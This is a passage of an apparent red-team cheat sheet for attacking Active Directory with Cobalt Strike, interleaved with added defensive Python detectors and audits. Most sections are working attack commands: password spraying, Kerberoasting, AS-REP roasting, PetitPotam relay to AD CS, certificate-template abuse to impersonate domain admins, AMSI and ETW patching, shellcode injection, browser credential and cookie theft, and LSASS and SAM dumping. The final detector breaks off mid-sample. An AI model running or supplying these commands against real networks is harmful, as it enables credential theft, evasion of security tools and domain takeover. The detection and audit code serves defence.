313 | ```
314 | [Net-GPPPassword](https://github.com/outflanknl/Net-GPPPassword) .NET port of get-gpppassword
315 | ```
316 | execute-assembly C:\Net-GPPPassword.exe lab.com
317 | ```
318 | [Get-GPPAutologon.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPAutologon.ps1) PowerSploit module
319 | ```
320 | # Get-GPPAutologon searches the domain controller for registry.xml to find autologon information and returns the username and password
321 | powershell-import --> Get-GPPAutologon.ps1
322 | powerpick Get-GPPAutologon
323 | ```
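The defensive counterpart to the two PowerSploit modules above is to audit SYSVOL yourself for the same files and report every place a Group Policy Preferences credential still lives. The following is an added example, not code from PowerSploit or Net-GPPPassword: it walks a SYSVOL-like tree, parses the XML, and reports any `cpassword` attribute in the four item files Get-GPPPassword names plus any `DefaultPassword` registry value in `Registry.xml` (what Get-GPPAutologon looks for), without decrypting anything. The sample GPO files, the GPO GUID and the base64 value are constructed for the example.

```python
"""Audit a SYSVOL tree for Group Policy Preferences XML that still carries
credentials. Added example, not part of PowerSploit or Net-GPPPassword.
It reports where a cpassword / autologon DefaultPassword lives; it does not
decrypt anything. The sample files below are constructed."""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP item files that can embed a cpassword attribute (the set named in the
# Get-GPPPassword comment above) plus Registry.xml for autologon values.
CPASSWORD_FILES = {"groups.xml", "scheduledtasks.xml", "services.xml", "datasources.xml"}
REGISTRY_FILE = "registry.xml"
# Attribute that names the account, depending on the preference type.
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")

# Constructed samples: a Groups.xml with a stored local-admin password,
# a Services.xml without credentials, and a Registry.xml that sets autologon.
GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="localadmin">
    <Properties action="U" cpassword="Q29uc3RydWN0ZWRQbGFjZWhvbGRlcg==" userName="localadmin" changeLogon="0" neverExpires="1"/>
  </User>
</Groups>
"""
SERVICES_XML = """<?xml version="1.0" encoding="utf-8"?>
<NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E8DD}">
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A80}" name="Spooler">
    <Properties startupType="AUTOMATIC" serviceName="Spooler" serviceAction="START"/>
  </NTService>
</NTServices>
"""
REGISTRY_XML = """<?xml version="1.0" encoding="utf-8"?>
<RegistrySettings clsid="{A3CCFC41-DFDB-43a5-8D26-0FE8B954DA51}">
  <Registry clsid="{9CD4B2F4-923D-47f5-A062-E897DD1DAD50}" name="DefaultPassword">
    <Properties action="U" hive="HKEY_LOCAL_MACHINE" key="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" name="DefaultPassword" type="REG_SZ" value="constructed-autologon-secret"/>
  </Registry>
  <Registry clsid="{9CD4B2F4-923D-47f5-A062-E897DD1DAD50}" name="DefaultUserName">
    <Properties action="U" hive="HKEY_LOCAL_MACHINE" key="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" name="DefaultUserName" type="REG_SZ" value="kiosk"/>
  </Registry>
</RegistrySettings>
"""


def build_sample_sysvol():
    """Write the constructed GPO files into a temporary SYSVOL-like tree."""
    root = tempfile.mkdtemp(prefix="sysvol-")
    gpo = os.path.join(root, "lab.com", "Policies", "{CONSTRUCTED-GPO-GUID}", "Machine", "Preferences")
    for sub, name, body in (("Groups", "Groups.xml", GROUPS_XML),
                            ("Services", "Services.xml", SERVICES_XML),
                            ("Registry", "Registry.xml", REGISTRY_XML)):
        os.makedirs(os.path.join(gpo, sub), exist_ok=True)
        with open(os.path.join(gpo, sub, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def audit_sysvol(root):
    """Walk SYSVOL and return one finding per stored credential location."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            lname = name.lower()
            if lname not in CPASSWORD_FILES and lname != REGISTRY_FILE:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # malformed preference file; worth a separate look
            rel = os.path.relpath(path, root)
            for elem in tree.iter():
                if lname in CPASSWORD_FILES and elem.get("cpassword") is not None:
                    user = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
                    findings.append({"kind": "cpassword", "file": rel, "user": user})
                elif (lname == REGISTRY_FILE and elem.tag == "Properties"
                      and elem.get("name", "").lower() == "defaultpassword" and elem.get("value")):
                    findings.append({"kind": "autologon", "file": rel, "user": ""})
    return findings


if __name__ == "__main__":
    for f in audit_sysvol(build_sample_sysvol()):
        print(f)
```

Run it against `\\<dc>\SYSVOL\<domain>\Policies` (read access is all it needs). Every hit is a GPO to clean up: delete the preference item, rotate the password it carried, and remove the file from SYSVOL, since the AES key that protects `cpassword` is public and any domain user can read the share.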
324 |
325 | ### LAPS Passwords
326 | [SharpLaps](https://github.com/swisskyrepo/SharpLAPS) - Retrieve LAPS passwords from AD
327 | The ms-Mcs-AdmPwd attribute stores the clear-text LAPS password; SharpLAPS reads it over LDAP
328 | `execute-assembly SharpLAPS.exe /user:DOMAIN\USER /pass:PASSWORD /host:IPADDRESS`
329 |
330 |
331 | ### Password spraying
332 | [DomainPasswordSpray.ps1](https://github.com/dafthack/DomainPasswordSpray)
333 | ```
334 | powershell-import --> DomainPasswordSpray.ps1
335 | # Get the full domain user list (Optional)
336 | powershell Get-DomainUserList -Domain lab.com -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt
337 |
338 | # Password spray from a username and password list
339 | powershell Invoke-DomainPasswordSpray -UserList userlist.txt -PasswordList passlist.txt -Domain lab.com -OutFile sprayed-creds.txt
340 |
341 | # Auto spray a specific password on an auto-generated user list (very noisy)
342 | powershell Invoke-DomainPasswordSpray -Password Summer2021
343 | ```
344 | Rubeus brute-force password spraying a single password or using a password file
345 | ```
346 | execute-assembly C:\Rubeus.exe brute /password:Password123! /domain:lab.com /noticket /outfile:passes-sprayed.txt [/passwords:PASSWORDS_FILE] [/user:USER | /users:USERS_FILE] [/creduser:DOMAIN\\USER & /credpassword:PASSWORD] [/dc:DOMAIN_CONTROLLER] [/verbose] [/nowrap]
347 | ```
348 | [SharpSpray](https://github.com/jnqpblc/SharpSpray) - .NET port of PowerSpray.ps1
349 | ```
350 | # By default it will automatically generate a user list from the domain using LDAP
351 | # Sleeps 30 minutes between each password cycle, delays 300 milliseconds between each password guess attempt
352 | execute-assembly C:\SharpSpray.exe --Passwords Summer2021,Fall2021 --Sleep 30 --Delay 300
353 | ```
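All three spraying tools above leave the same footprint on the domain controllers: one source address producing authentication failures against many distinct accounts in a short window. The following is an added example, not code from DomainPasswordSpray, Rubeus or SharpSpray: a sliding-window detector over failed-logon events. The log lines are constructed, and their layout (time, event id, target account, source address) is an assumption of the example; real 4625/4771 events carry these as named fields.

```python
"""Detect password spraying in failed-logon telemetry: one source trying
many distinct accounts in a short window. Added example, not part of
DomainPasswordSpray, Rubeus or SharpSpray. Log lines are constructed and
the field layout (time, event id, account, source) is an assumption."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon events: Security 4625 (logon failure) and
# 4771 (Kerberos pre-authentication failure). Fields are
# "<iso-time> <event id> <target account> <source ip>".
SAMPLE_LOG = """\
2024-03-04T09:00:01 4771 alice 10.10.5.20
2024-03-04T09:00:02 4771 bob 10.10.5.20
2024-03-04T09:00:02 4771 carol 10.10.5.20
2024-03-04T09:00:03 4771 dave 10.10.5.20
2024-03-04T09:00:03 4771 erin 10.10.5.20
2024-03-04T09:00:04 4771 frank 10.10.5.20
2024-03-04T09:00:05 4771 svc_backup 10.10.5.20
2024-03-04T09:01:10 4625 grace 10.10.7.8
2024-03-04T09:01:15 4625 grace 10.10.7.8
2024-03-04T09:01:22 4625 grace 10.10.7.8
2024-03-04T09:30:00 4771 alice 10.10.5.20
"""

FAILED_LOGON_EVENTS = {"4625", "4771"}


def parse_events(text):
    """Turn the constructed lines into event dicts; skips anything else."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[1] not in FAILED_LOGON_EVENTS:
            continue
        events.append({"time": datetime.fromisoformat(parts[0]),
                       "event": parts[1], "user": parts[2].lower(), "src": parts[3]})
    return events


def detect_spray(events, window_s=300, min_users=5):
    """Return one alert per source that failed against >= min_users distinct
    accounts inside any sliding window of window_s seconds."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = []
    window = timedelta(seconds=window_s)
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["time"])
        live = Counter()  # accounts currently inside the window
        start = 0
        for e in evs:
            live[e["user"]] += 1
            # Slide the window start forward past events older than window_s.
            while e["time"] - evs[start]["time"] > window:
                old = evs[start]["user"]
                live[old] -= 1
                if live[old] == 0:
                    del live[old]
                start += 1
            if len(live) >= min_users:
                alerts.append({"src": src, "first": evs[start]["time"],
                               "last": e["time"], "users": sorted(live)})
                break  # one alert per source is enough to page on
    return alerts


if __name__ == "__main__":
    for a in detect_spray(parse_events(SAMPLE_LOG)):
        print(a["src"], a["first"], a["last"], a["users"])
```

The single repeated failure from 10.10.7.8 is a user mistyping a password and never trips the rule; the burst from 10.10.5.20 does. A low-and-slow spray like SharpSpray's 30-minute sleep between cycles needs a much longer window (hours to a day) with a distinct-account count per source, and a 4771 with status `0x18` (KDC_ERR_PREAUTH_FAILED) is the Kerberos-side signal to key on.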
354 |
355 | ### Kerberoasting
356 | PowerView kerberoasting (Outdated and still reliant on PowerShell)
357 | ```
358 | # Get users with SPN set
359 | powershell Get-DomainUser -SPN
360 |
361 | # Kerberoast all users
362 | powershell Invoke-Kerberoast -OutputFormat hashcat | fl
363 |
364 | # Kerberoast specific user
365 | powershell Invoke-Kerberoast -Identity testaccount -Domain lab.com -OutputFormat hashcat | fl
366 | ```
367 |
368 | Rubeus kerberoasting
369 | ```
370 | # Kerberoast all users
371 | execute-assembly C:\Rubeus.exe kerberoast /outfile:KerbHashes.txt /domain:lab.com
372 |
373 | # Kerberoast specific user
374 | execute-assembly C:\Rubeus.exe kerberoast /outfile:KerbHash.txt /user:testaccount /domain:lab.com
375 | ```
376 |
377 | ### AS-REP Roasting
378 | Targets users in AD that do not require Kerberos pre-authentication
379 | ```
380 | # AS-REP roast all users with Rubeus
381 | execute-assembly C:\Rubeus.exe asreproast /format:hashcat /outfile:C:\Temp\asrep-hashes.txt
382 |
383 | # AS-REP roast specific user with Rubeus
384 | execute-assembly C:\Rubeus.exe asreproast /user:testuser /format:hashcat /outfile:C:\Temp\asrep-hashes.txt
385 | ```
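Both roasting techniques above are visible on the domain controllers: Kerberoasting shows up as a burst of 4769 service-ticket requests with RC4 encryption (type 0x17) for user-account SPNs, and AS-REP roasting as 4768 requests where the pre-authentication type is 0 (logon without pre-authentication). The following is an added example, not PowerView's or Rubeus's code, that flags both from constructed key=value event lines whose field names mirror the Security log.

```python
"""Flag Kerberoasting and AS-REP roasting from domain controller Kerberos
events. Added example, not PowerView's or Rubeus's own code. Sample events
are constructed key=value lines; the field names mirror the Security log
(4769 = TGS request, 4768 = TGT request)."""
from collections import defaultdict

RC4_HMAC = "0x17"

# Constructed events: one requester pulls RC4 tickets for three user SPNs,
# a normal user gets AES tickets, and one no-preauth account is roasted.
SAMPLE_EVENTS = """\
EventID=4769 TargetUserName=jdoe@LAB.COM ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.5.20 Status=0x0
EventID=4769 TargetUserName=jdoe@LAB.COM ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.10.5.20 Status=0x0
EventID=4769 TargetUserName=jdoe@LAB.COM ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.10.5.20 Status=0x0
EventID=4769 TargetUserName=alice@LAB.COM ServiceName=WS01$ TicketEncryptionType=0x12 IpAddress=10.10.7.8 Status=0x0
EventID=4769 TargetUserName=alice@LAB.COM ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.7.8 Status=0x0
EventID=4768 TargetUserName=testuser ServiceName=krbtgt TicketEncryptionType=0x17 PreAuthType=0 IpAddress=10.10.5.20 Status=0x0
EventID=4768 TargetUserName=bob ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 IpAddress=10.10.7.8 Status=0x0
"""


def parse_kv_events(text):
    """Parse 'key=value key=value' lines into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        events.append(dict(tok.split("=", 1) for tok in line.split()))
    return events


def is_roastable_service(name):
    # Tickets for machine accounts (name$) and the krbtgt service are routine;
    # RC4 tickets for ordinary user SPNs are what a Kerberoaster asks for.
    return not name.endswith("$") and name.lower() != "krbtgt"


def detect_roasting(events, min_services=3):
    """Return kerberoast candidates (per requester) and AS-REP roast hits."""
    by_requester = defaultdict(set)  # (account, ip) -> SPNs requested with RC4
    asrep = []
    for e in events:
        if e.get("Status") != "0x0":  # only successful issuances matter here
            continue
        if e.get("EventID") == "4769":
            if e.get("TicketEncryptionType") == RC4_HMAC and is_roastable_service(e["ServiceName"]):
                by_requester[(e["TargetUserName"], e["IpAddress"])].add(e["ServiceName"])
        elif e.get("EventID") == "4768":
            # PreAuthType 0 = logon without pre-authentication: the AS-REP
            # hands out material encrypted with the account's own key.
            if e.get("PreAuthType") == "0":
                asrep.append({"account": e["TargetUserName"], "src": e["IpAddress"],
                              "etype": e.get("TicketEncryptionType")})
    kerberoast = [{"account": acct, "src": ip, "services": sorted(svcs)}
                  for (acct, ip), svcs in by_requester.items() if len(svcs) >= min_services]
    return {"kerberoast": kerberoast, "asreproast": asrep}


if __name__ == "__main__":
    print(detect_roasting(parse_kv_events(SAMPLE_EVENTS)))
```

RC4 alone is not the whole signal, since a roaster can also ask for AES tickets; the number of distinct SPNs one principal requests in a short period is the second leg. On the mitigation side, the AS-REP finding maps directly to an account with "Do not require Kerberos preauthentication" set, and the Kerberoast finding to service accounts that should carry long random passwords or be moved to gMSAs.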
386 |
387 | ### Coercion attacks
388 | #### [PetitPotam](https://github.com/topotam/PetitPotam) - NTLM relay to AD CS
389 | > PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions
390 | - Requires AD CS web server enrollment enabled
391 | - Requires Kali running Impacket on the target domain
392 | ```
393 | # Find AD CS web server and verify if web enrollment is enabled by browsing to the URL: `http://ADCS-server.domain.com/certsrv/`
394 | run certutil.exe
395 |
396 | # Start NTLM relay server on Kali
397 | python3 ntlmrelayx.py -t http://ADCS-server.domain.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
398 |
399 | # Force coercion via PetitPotam in Cobalt Strike Beacon - Observe "Attack Success!!!" in output if it worked
400 | run PetitPotam.exe
401 |
402 | # NTLM relay output will have base64 ticket of target DC machine account
403 | # Use Rubeus to request a TGT for the DC machine account to escalate to Domain Admin
404 | execute-assembly C:\Rubeus.exe asktgt /dc: /domain:domain.com /user:$ /ptt /certificate:
405 |
406 | # Verify asktgt command worked by doing an 'ls' command on the DC
407 | ls \\\c$
408 | ```
409 | References:
410 | - [https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/](https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/)
411 | - [https://hakin9.org/domain-takeover-with-petitpotam-exploit/](https://hakin9.org/domain-takeover-with-petitpotam-exploit/)
412 | ------------------------------------------------------------------------------------------
413 | ## Defense Evasion
414 |
415 | ### Shellcode injection techniques
416 | Several methods are available within Cobalt Strike itself or via BOFs
417 | ```
418 | # Spawn a beacon into an existing process
419 | inject HTTPSLISTENER
420 |
421 | # Inject raw shellcode into an existing process
422 | # Create shellcode: Cobalt Strike --> Attacks --> Packages --> Windows Executable (S) --> Output = Raw --> Creates "beacon.bin" file
423 | shinject C:\beacon.bin
424 |
425 | # Shellcode injection methods using Windows syscalls with [BOFs script](https://github.com/ajpc500/BOFs)
426 | syscalls_inject
427 | syscalls_shinject C:\beacon.bin
428 | static_syscalls_inject
429 | static_syscalls_shinject C:\beacon.bin
430 | syscalls_shspawn C:\beacon.bin
431 | ```
432 |
433 | ### AMSI patch
434 | [BOF-patchit](https://github.com/ScriptIdiot/BOF-patchit) for current process
435 | `patchit amsi`
436 |
437 | [boku7/InjectAmsiBypass](https://github.com/boku7/injectAmsiBypass) BOF
438 | Patch AMSI in remote process
439 | `inject-amsiBypass `
440 |
441 | ### ETW patch
442 | [BOF-patchit](https://github.com/ScriptIdiot/BOF-patchit) for current process
443 | `patchit etw`
444 |
445 | [ajpc500/BOFs](https://github.com/ajpc500/BOFs/) ETW patch for current process
446 | `etw stop` / `etw start`
447 |
448 | ### API Unhooking
449 | Cobalt Strike's hail-mary unhooking function. "This is a Beacon Object File to refresh DLLs and remove their hooks. The code is from Cylance's Universal Unhooking research"
450 | `unhook`
451 |
452 | ------------------------------------------------------------------------------------------
453 | ## Exploitation
454 |
455 | ### DPAPI decryption and extraction on Windows systems
456 | [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI)
457 | ```
458 | # SharpDPAPI to retrieve domain DPAPI backup key and output to file which is used for subsequent attacks (requires DA privileges)
459 | execute-assembly C:\SharpDPAPI.exe backupkey /file:key.pvk
460 |
461 | # Decrypt any RDG (remote desktop) passwords found using the domain backup key (can also use local Admin account or master key)
462 | execute-assembly C:\SharpDPAPI.exe rdg /pvk:key.pvk /unprotect
463 |
464 | # Decrypt any KeePass passwords found using the domain backup key (can also use local Admin account or master key)
465 | execute-assembly C:\SharpDPAPI.exe keepass /pvk:key.pvk /unprotect
466 | ```
467 |
468 | SharpChrome to extract and decrypt a user's Chrome sessions/passwords
469 | ```
470 | # Dump Chrome logins on the local system for the current user
471 | execute-assembly C:\SharpChrome.exe logins /unprotect
472 |
473 | # Dump Chrome cookies on the local system for the current user
474 | execute-assembly C:\SharpChrome.exe cookies
475 |
476 | # Dump Chrome cookies on the local system only for a specific URL - Output in JSON format to import into "Cookie Editor" browser extension
477 | execute-assembly C:\SharpChrome.exe cookies /format:json /browser:chrome /url:".*microsoft.com"
478 |
479 | # Dumping Chrome login passwords on remote machines using the domain backup key (can also use local user password)
480 | execute-assembly C:\SharpChrome.exe logins /pvk:key.pvk /server:SERVER.lab.com
481 |
482 | # Dumping and decrypting Chrome user cookies and sessions on remote machines using the domain backup key (can also use local user password)
483 | # Cookies can then be imported into Chrome/Firefox using the extension Cookie-Editor
484 | execute-assembly C:\SharpChrome.exe cookies /pvk:key.pvk /server:SERVER.lab.com
485 | ```
486 |
487 | ### [SharpWeb](https://github.com/djhohnstein/SharpWeb) - Retrieve saved credentials in Chrome, Firefox and Edge
488 | ```
489 | # Retrieve all saved browser credentials
490 | execute-assembly C:\SharpWeb.exe all
491 | ```
492 |
493 | ### Active Directory Certificate Services (AD CS) Attack
494 | [Certify - GhostPack](https://github.com/GhostPack/Certify)
495 | Enumerate and abuse misconfigurations in AD CS
496 | ```
497 | # Find vulnerable certificates with Certify.exe
498 | execute-assembly C:\Certify.exe find /vulnerable /domain:lab.com
499 |
500 | # Request a new certificate for a vulnerable template from the above output
501 | execute-assembly C:\Certify.exe request /ca:lab.com\ops-dc01 /template:VulnTemplate /altname:DomainAdminUser1
502 |
503 | # Copy the certificate private key from the above output to a file, then request a TGT using the certificate file with Rubeus
504 | execute-assembly C:\Rubeus.exe asktgt /user:DomainAdminUser1 /certificate:C:\Temp\cert.pfx /domain:lab.com
505 | ```
506 |
507 | [Certipy - Python](https://github.com/ly4k/Certipy)
508 | Use Python through a SOCKS proxy or a Linux VM on the domain to find and exploit misconfigured AD CS certs
509 | ```
510 | # First, start a SOCKS proxy in Cobalt Strike (or skip to the next step if you have an on-site Linux VM)
511 | socks socks5
512 |
513 | # Configure proxychains on Kali/Linux VM to proxy traffic through C2
514 |
515 | # Find vulnerable certs with Certipy through proxy
516 | proxychains certipy find -u 'my-user@domain.com' -p 'PASSWORD' -dc-ip 10.100.32.200 -vulnerable -timeout 30
517 |
518 | # Request a certificate for a vulnerable cert template through proxy
519 | proxychains certipy req -u 'my-user@domain.com' -p 'PASSWORD' -dc-ip 10.100.32.200 -ca corp-DC-CA -target ca.domain.com -template VulnTemplate -debug -upn 'DomainAdminAcc@domain.com'
520 | # Authenticate with the output .PFX cert file to request a TGT for the DomainAdminAcc user
521 | proxychains certipy auth -pfx DomainAdminAcc.pfx -username DomainAdminAcc -domain 'domain.com' -dc-ip X.X.X.X
522 | --> Command will output NTLM hash of target account and the user's certificate
523 |
524 | # Use the output certificate of the DomainAdminAcc account with Rubeus
525 | execute-assembly C:\Rubeus.exe asktgt /user:DomainAdminAcc /certificate:DomainAdminAcc.pfx /ptt /domain:domain.com /dc:DomainController.domain.com
526 | ls \\DomainController\c$ --> Verify the command succeeded by running 'ls' against the DC
527 | ```
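What `Certify.exe find /vulnerable` and `certipy find -vulnerable` report for the ESC1 case is a conjunction of template settings: the enrollee may supply the subject, the EKU permits authentication, no manager approval or authorized signature is required, and a low-privileged group can enroll. The following is an added example, not Certify's or Certipy's code, that applies that check so an AD CS administrator can audit their own templates; the template records are constructed dicts shaped like the relevant `pKICertificateTemplate` LDAP attributes, and real data would come from an LDAP query.

```python
"""Audit certificate templates for the ESC1 misconfiguration that
'Certify find /vulnerable' and 'certipy find -vulnerable' look for.
Added example, not Certify's or Certipy's code; template records are
constructed dicts shaped like the LDAP attributes of
pKICertificateTemplate objects."""

# msPKI-Certificate-Name-Flag bit: requester supplies the subject / SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: certificate manager approval required
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that let a certificate authenticate as the principal it names
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Principals whose enrollment right means "anyone in the domain"
LOW_PRIV_PRINCIPALS = {"domain users", "authenticated users", "domain computers", "everyone"}

# Constructed template records (assumed shape; real data comes from LDAP).
# 'name_flag' = msPKI-Certificate-Name-Flag, 'enrollment_flag' =
# msPKI-Enrollment-Flag, 'ra_signatures' = msPKI-RA-Signature,
# 'ekus' = pKIExtendedKeyUsage, 'enroll' = principals with the Enroll right.
SAMPLE_TEMPLATES = [
    # Subject built by the CA from AD, so the requester cannot pick a SAN
    {"name": "User", "name_flag": 0x0, "enrollment_flag": 0x0, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"], "enroll": ["Domain Users"]},
    {"name": "VulnTemplate", "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, "enrollment_flag": 0x0,
     "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"name": "ApprovedTemplate", "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "enrollment_flag": CT_FLAG_PEND_ALL_REQUESTS, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"name": "AdminOnly", "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, "enrollment_flag": 0x0,
     "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Admins"]},
    {"name": "WebServer", "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, "enrollment_flag": 0x0,
     "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.1"], "enroll": ["Domain Users"]},
]


def esc1_reasons(t):
    """Return the conditions that together make template t ESC1; empty if not."""
    if not t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        return []  # CA builds the subject from AD; no SAN spoofing possible
    if t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        return []  # manager approval blocks unattended issuance
    if t["ra_signatures"] > 0:
        return []  # an authorized signature is required on the request
    if t["ekus"] and not (set(t["ekus"]) & AUTH_EKUS):
        return []  # certificate cannot be used for authentication
    low = [p for p in t["enroll"] if p.lower() in LOW_PRIV_PRINCIPALS]
    if not low:
        return []  # only privileged principals can enroll
    return ["enrollee supplies subject (SAN can name any principal)",
            "no manager approval and no RA signature required",
            "EKU allows authentication" if t["ekus"] else "no EKU restriction (any purpose)",
            "enrollable by " + ", ".join(low)]


def audit_templates(templates):
    """Map template name -> ESC1 reasons for every template that qualifies."""
    findings = {}
    for t in templates:
        reasons = esc1_reasons(t)
        if reasons:
            findings[t["name"]] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in audit_templates(SAMPLE_TEMPLATES).items():
        print(name, reasons)
```

Each early return in `esc1_reasons` is also a remediation: clearing the supply-subject flag, requiring manager approval, requiring an RA signature, or restricting the Enroll right to the intended group each closes the path on its own. The same record shape extends naturally to ESC2 (Any Purpose or no EKU) and ESC4 (write access on the template object), which Certify and Certipy also report.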
528 |
529 | ### [MalSCCM](https://github.com/nettitude/MalSCCM) - Exploiting SCCM servers to deploy malicious applications
530 | - Requires admin privileges on target SCCM server
531 | ```
532 | # Find the SCCM management servers
533 | execute-assembly C:\MalSCCM.exe locate
534 |
535 | # Check if the current host is an SCCM client
536 | execute-assembly C:\MalSCCM.exe
537 |
538 | # Gather all info from SCCM including users, groups, forest, application, deployments
539 | execute-assembly C:\MalSCCM.exe inspect /all /server:
540 |
541 | # You can use MalSCCM to deploy a malicious application to a target group then force the users to check-in and run your payload
542 | # This is explained in much more detail in the walkthrough here: https://labs.nettitude.com/blog/introducing-malsccm/
543 | ```
544 |
545 | ------------------------------------------------------------------------------------------
546 | ## Exfiltration - Password Attacks
547 |
548 | ### Dumping LSASS locally (all commands below require local Admin)
549 | Mimikatz built-in to dump passwords/hashes to console
550 | ```
551 | # Works against most updated systems with AV/EDR if running as SYSTEM
552 | logonpasswords
553 | ```
554 | Dumping LSASS with ProcDump.exe (requires touching disk) (NOTE: Might get flagged by AV and raise alerts but can still output LSASS dump file)
555 | ```
556 | upload --> ProcDump.exe
557 | run ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
558 | ```
559 | Dumping LSASS with [Out-Minidump.ps1 from PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1) without touching disk
560 | ```
561 | powershell Get-Process | Out-Minidump -DumpFilePath C:\temp
562 | ```
563 | Extract LSASS process with [SafetyKatz](https://github.com/GhostPack/SafetyKatz)
564 | ```
565 | execute-assembly C:\SafetyKatz.exe --> Dumps LSASS process to .dmp file on the local system
566 | ```
567 | LSASS dump BOFs
568 | ```
569 | minidumpwritedump --> https://github.com/rookuu/BOFs/tree/main/MiniDumpWriteDump
570 | nanodump --> https://github.com/fortra/nanodump
571 | ppldump --> https://github.com/EspressoCake/PPLDump_BOF
572 | static_syscalls_dump C:\Users\USER\Desktop\output.dmp --> https://github.com/ajpc500/BOFs/blob/main/StaticSyscallsDump/README.md
573 | ```
574 | Extracting passwords/hashes offline from LSASS dump using Mimikatz (**ON YOUR OWN SYSTEM!**)
575 | ```
576 | mimikatz.exe log "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords /all" "sekurlsa::wdigest" exit (Run on your local box)
577 | ```
578 |
579 | ### SAM database dump
580 |
581 | SAM dump built into CS - Injects into LSASS to dump local SAM database hashes to console
582 | ```
583 | hashdump
584 | ```
585 | SAM dump using reg.exe
586 | ```
587 | run reg.exe save HKLM\sam sam.save
588 | run reg.exe save HKLM\security security.save
589 | run reg.exe save HKLM\system system.save
590 |
591 | # Download the SAM files then dump the hashes offline using secretsdump.py
592 | download sam.save
593 | download security.save
594 | download system.save
595 | python secretsdump.py -sam sam.save -security security.save -system system.save LOCAL (Run **ON YOUR OWN SYSTEM**)
596 | ```
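The LSASS dump and SAM dump sections above share a telemetry footprint that Sysmon records well: Event 10 (ProcessAccess) when a process opens a handle on `lsass.exe` with memory-read rights, and Event 1 (ProcessCreate) for command lines such as `procdump -ma lsass` or `reg save HKLM\sam`. The following is an added example, not code from any tool on this page, that flags both from constructed key=value event lines; the access-mask bits, the call-trace `UNKNOWN(` marker for unbacked code and the allowlist are stated in the comments, and the allowlist is an assumption to tune per environment.

```python
"""Detect the credential-dumping behaviour from the LSASS and SAM dump
sections above in Sysmon telemetry: Event 10 (ProcessAccess) handles on
lsass.exe with read/write rights, and Event 1 (ProcessCreate) command
lines that save the SAM/SECURITY/SYSTEM hives or dump lsass. Added example,
not part of any tool on this page; the events are constructed lines."""
import re

# Constructed Sysmon events as 'key=value' pairs (values may contain spaces).
SAMPLE_SYSMON = r"""
EventID=10 SourceImage=C:\Tools\ProcDump.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d4f4|C:\Tools\ProcDump.exe+2a31
EventID=10 SourceImage=C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1410 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d4f4
EventID=10 SourceImage=C:\Windows\System32\taskmgr.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d4f4
EventID=10 SourceImage=C:\Windows\System32\notepad.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d4f4|UNKNOWN(000001F2A3B40000)
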